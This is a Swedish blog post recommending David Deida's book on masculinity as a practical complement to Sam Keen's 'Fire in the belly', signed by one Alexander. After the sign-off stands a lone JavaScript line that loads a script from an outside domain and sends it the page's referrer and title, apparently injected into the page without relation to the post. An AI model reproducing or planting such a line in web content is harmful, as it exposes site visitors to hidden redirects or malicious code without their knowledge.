För några dagar sen tipsade Victor om Sam Keen’s ”Fire in the belly” som handlade om manlighet.

Ungefär samtidigt som Victor läste denna boken för ett år sen läste jag en liknande bok skriven av David Deida vid namn ”Den Suveräna Mannens väg” eller ”The way of the superior man” som den heter på engelska.

Då jag läst bägge böckerna (vilket jag har för mig att även Victor har gjort) så kan jag säga att de komplenterar varandra otroligt bra.

Då ”fire in the belly” är en väldigt filosofisk bok och förklarar vikten för män att genomgå en inre resa pratar David Deida mycket mer praktiskt och ger oss väldigt konkreta exempel på hur vi kan ersätta vårt beteende.

Där ”Den suveränna mannens väg” skapar tankeställare som ”Fire in the belly” ger svaren på och omvänt.

David Deida har i mer än 20 år lärt ut Yoga och hans filosofi om män är väldigt baserat på yoga och hinduistisk lära och han lyckas verkligen ge det hela en modern förklaring som vanliga män i västerländsk kultur kan förstå.

Deida pratar om hur en man ska möta utmaningar i livet, kvinnor och även hur han ska möta sig själv. Han pratar om hur man aldrig kommer att kunna avsluta något i sitt liv utan att allt är en process och att man ska lära sig acceptera det. Han pratar om attraktion ur ett perspektiv på polaritet som gör det väldigt förståerligt. Han pratar om hur kvinnor hela tiden kommer att testa en man för att få känna upplevelsen av hans integritet och autenticitet.

Det är bara en helt otroligt bra bok och den kan förändra ditt liv, så om du har tid nu i sommaren när du ligger i en strand så läs den.

David Deida – Den Suveräna Mannens Väg

Mvh

- Alexander

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;